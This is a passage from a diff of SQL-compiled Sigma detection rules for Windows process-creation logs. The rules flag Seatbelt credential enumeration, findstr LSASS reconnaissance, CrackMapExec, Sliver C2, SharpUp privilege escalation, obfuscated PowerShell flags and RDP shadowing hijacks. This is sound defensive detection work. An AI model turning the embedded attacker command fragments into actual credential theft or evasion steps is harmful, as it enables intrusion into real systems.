((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", - "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "title": "Renamed AutoHotkey.EXE Execution", + "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
Which can be used to gather information about the target machine", - "author": "blueteamer8699", + "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", + "author": "Nasreddine Bencherchali", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_lolbin_gather_network_info.yml" - }, - { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", - "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((NewProcessName LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64\\_UIA.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_renamed_autohotkey.yml" }, { - "title": "Arbitrary File Download Via MSPUB.EXE", - "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", - "status": "experimental", - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218" + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE 
'%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "author": "frack113", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powercfg_execution.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detects 
the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": 
"proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Use NTFS Short Name in Command Line", - "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' 
ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE 
'\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine 
LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects potential commandline obfuscation using unicode 
characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Exploit for CVE-2017-0261", - "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "status": "test", - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + "Legitimate deinstallation by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Suspicious Runscripthelper.exe", + "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_lolbin_runscripthelper.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - 
"attack.t1059.005", - "attack.t1059.007" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' 